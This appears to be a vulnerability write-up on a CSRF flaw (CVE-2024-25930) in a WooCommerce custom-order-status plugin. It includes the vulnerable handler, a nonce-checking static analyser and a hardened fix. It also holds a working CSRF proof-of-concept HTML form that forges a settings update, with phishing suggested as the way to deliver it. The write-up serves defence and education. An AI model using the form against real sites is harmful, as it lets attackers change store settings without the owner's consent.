Cross-Site Request Forgery (CSRF) is a type of website vulnerability that allows an attacker to force users with active sessions on the website to perform unauthorized actions. A recent CVE (CVE-2024-25930) was discovered for the Nuggethon Custom Order Statuses plugin, a popular WooCommerce extension that allows store owners to create and manage custom order statuses on their eCommerce websites. The vulnerability affects plugin versions up to and including 1.5.2 (the advisory lists no lower bound).

This post will provide a deep dive into the details of this CVE, including code snippets to demonstrate the vulnerability, links to original references, and information on how to exploit the vulnerability. Please note that the provided information is for educational purposes only and should not be used for malicious purposes.

The Vulnerability

The Custom Order Statuses plugin for WooCommerce is vulnerable to CSRF because it lacks proper nonce validation. A nonce (number used once) is a unique value that the site generates and embeds in its own forms; the server checks it on submission, which helps prevent CSRF by confirming that the request originated from the site's own pages rather than from a third-party site. The Custom Order Statuses plugin does not perform this nonce validation when updating its custom order status settings.

Here's a code snippet that demonstrates the vulnerability:

// section of the plugin where the vulnerability is present
function custom_order_statuses_update() {
    if ( isset( $_POST['custom_order_status_submit'] ) ) {
        // No nonce check in the update function
        update_option( 'custom_order_statuses', $_POST['custom_order_statuses'] );
    }
}
add_action( 'init', 'custom_order_statuses_update' );

As you can see, there is no nonce check in the update function. This makes it possible for an attacker to forge a request and update the plugin settings without the knowledge or consent of the site administrator.
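One way to find this class of defect before it ships, as an added example that is not part of the plugin or of WordPress: a small heuristic static check over plugin source that flags functions which read request data and write options without ever calling one of WordPress's nonce-verification helpers (wp_verify_nonce, check_admin_referer, check_ajax_referer). The sample plugin source embedded below is constructed for this illustration; the function and constant names prefixed cos_ are assumptions.

```php
<?php
// Added example, not part of the plugin or of WordPress: a heuristic static
// check that flags functions reading request data and writing options without
// calling a nonce-verification helper. Token-based, so it ignores control flow.

const COS_NONCE_CHECKS  = [ 'wp_verify_nonce', 'check_admin_referer', 'check_ajax_referer' ];
const COS_STATE_WRITERS = [ 'update_option', 'add_option', 'delete_option', 'update_post_meta' ];
const COS_REQUEST_VARS  = [ '$_POST', '$_GET', '$_REQUEST' ];

/**
 * Return the names of named functions in $source that touch request data,
 * write persistent state, and never call a nonce check anywhere in the body.
 */
function cos_find_unverified_handlers( string $source ): array {
    $tokens   = token_get_all( $source );
    $count    = count( $tokens );
    $findings = [];

    for ( $i = 0; $i < $count; $i++ ) {
        if ( ! is_array( $tokens[ $i ] ) || $tokens[ $i ][0] !== T_FUNCTION ) {
            continue;
        }
        // Named function: the next non-whitespace token is its name.
        $name = null;
        for ( $j = $i + 1; $j < $count; $j++ ) {
            $t = $tokens[ $j ];
            if ( is_array( $t ) && $t[0] === T_WHITESPACE ) {
                continue;
            }
            if ( is_array( $t ) && $t[0] === T_STRING ) {
                $name = $t[1];
            }
            break; // '(' means a closure, '&' a by-reference function: both skipped
        }
        if ( $name === null ) {
            continue;
        }
        // Skip to the body's opening brace, then walk the body by brace depth.
        while ( $j < $count && $tokens[ $j ] !== '{' ) {
            $j++;
        }
        $depth = 0;
        $reads = $writes = $checks = false;
        for ( ; $j < $count; $j++ ) {
            $t = $tokens[ $j ];
            if ( $t === '{' ) { $depth++; continue; }
            if ( $t === '}' ) { if ( --$depth === 0 ) { break; } continue; }
            if ( ! is_array( $t ) ) { continue; }
            if ( $t[0] === T_VARIABLE && in_array( $t[1], COS_REQUEST_VARS, true ) ) { $reads = true; }
            if ( $t[0] === T_STRING ) {
                if ( in_array( $t[1], COS_STATE_WRITERS, true ) ) { $writes = true; }
                if ( in_array( $t[1], COS_NONCE_CHECKS, true ) ) { $checks = true; }
            }
        }
        $i = $j; // resume scanning after this function body
        if ( $reads && $writes && ! $checks ) {
            $findings[] = $name;
        }
    }
    return $findings;
}

// Constructed sample: the unprotected handler, a protected variant, and a
// read-only function that should not be flagged.
$sample = <<<'PHP'
<?php
function custom_order_statuses_update() {
    if ( isset( $_POST['custom_order_status_submit'] ) ) {
        update_option( 'custom_order_statuses', $_POST['custom_order_statuses'] );
    }
}
function custom_order_statuses_update_safe() {
    check_admin_referer( 'cos_save_statuses', 'cos_nonce' );
    update_option( 'custom_order_statuses', sanitize_text_field( wp_unslash( $_POST['custom_order_statuses'] ) ) );
}
function custom_order_statuses_render() {
    echo esc_html( get_option( 'custom_order_statuses' ) );
}
PHP;

print_r( cos_find_unverified_handlers( $sample ) );
```

Run against the constructed sample, only custom_order_statuses_update is reported: it reads $_POST and calls update_option with no nonce helper in its body, while the _safe variant calls check_admin_referer and the render function writes nothing. Because the check is token-based, a nonce call that is present but unreachable (for example, inside a branch that is never taken) would still silence it, so treat its output as a worklist for manual review rather than a verdict.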

Exploitation

To exploit this vulnerability, an attacker would need to craft a malicious request that an authenticated user would have to make (e.g., by sending a phishing email with a link to the malicious request). When the user clicks on the link, their browser would make a POST request to the target website, updating the custom order statuses settings.

Here's an example of a malicious HTML form that can be used to exploit the vulnerability:

<html>
  <body>
    <form action="http://victim-website/wp-admin/admin-post.php" method="post">
      <input type="hidden" name="custom_order_statuses" value="malicious_value" />
      <input type="hidden" name="custom_order_status_submit" value="1" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>

Upon clicking the submit button, the browser sends a POST request to the victim's website, updating the plugin settings with the given "malicious_value". Keep in mind that for the attack to succeed, the user making the request must have an active, authenticated session on the target WooCommerce site.

The CVE was reported by multiple security researchers:

1. CVE-2024-25930: CSRF vulnerability in Nuggethon Custom Order Statuses for WooCommerce (discussion)
2. WooCommerce Custom Order Statuses CSRF Vulnerability Report

Conclusion and Recommendations

To mitigate this vulnerability, the plugin developers should add proper nonce validation checks to the update function. In the meantime, users should update to the latest version of the plugin, if available, or temporarily disable the plugin until a patched version is released.
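What that fix looks like in practice, as an added example that is not the plugin's own code: the settings form is rendered with wp_nonce_field(), the submission is routed through admin-post.php instead of running on every page load via 'init', and the handler verifies the nonce with check_admin_referer(), checks the user's capability, and sanitizes the value before storing it. The option name, the field names, the cos_ function prefix and the 'cos_save_statuses' action name are assumptions chosen for this illustration.

```php
<?php
// Added example (not the plugin's own code): the same settings update,
// rewritten with the checks WordPress provides against CSRF.
// Option name, field names and the 'cos_save_statuses' action are assumptions.

// 1. Render the settings form with a nonce bound to this action and to the
//    current user. wp_nonce_field() emits the hidden nonce field plus a
//    referer field; a cross-site form on an attacker's page cannot supply it.
function cos_render_settings_form() {
    $current = get_option( 'custom_order_statuses', '' );
    ?>
    <form action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" method="post">
        <?php wp_nonce_field( 'cos_save_statuses', 'cos_nonce' ); ?>
        <input type="hidden" name="action" value="cos_save_statuses" />
        <input type="text" name="custom_order_statuses" value="<?php echo esc_attr( $current ); ?>" />
        <?php submit_button( 'Save statuses' ); ?>
    </form>
    <?php
}

// 2. Handle the submission only through admin-post.php for logged-in users
//    (the 'admin_post_{action}' hook), not on 'init' where every request runs it.
function cos_handle_settings_update() {
    // Capability check: only users allowed to manage the store may change it.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Nonce check: check_admin_referer() dies with a 403 if the field is
    // missing or invalid, which is exactly what a forged cross-site POST lacks.
    check_admin_referer( 'cos_save_statuses', 'cos_nonce' );

    // Sanitize before storing; never write raw $_POST into options.
    $value = isset( $_POST['custom_order_statuses'] )
        ? sanitize_text_field( wp_unslash( $_POST['custom_order_statuses'] ) )
        : '';
    update_option( 'custom_order_statuses', $value );

    // Return to the settings page with a flag the page can use to show a notice.
    $back = wp_get_referer() ?: admin_url();
    wp_safe_redirect( add_query_arg( 'cos_updated', '1', $back ) );
    exit;
}
add_action( 'admin_post_cos_save_statuses', 'cos_handle_settings_update' );
```

Two of these changes matter independently of the nonce: hooking 'admin_post_cos_save_statuses' rather than 'init' means the handler only runs for logged-in users who post to admin-post.php with that action, and current_user_can() ensures a lower-privileged account cannot change store settings even with a valid nonce. The nonce itself is what defeats the forged form shown earlier, since WordPress ties it to the action name, the user, and a limited time window.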

Always exercise caution with external links and requests, even from supposedly trusted sources, and keep your site and plugins updated to minimize the risk of further vulnerabilities.

Timeline

Published on: 02/29/2024 01:44:17 UTC
Last modified on: 02/29/2024 13:49:29 UTC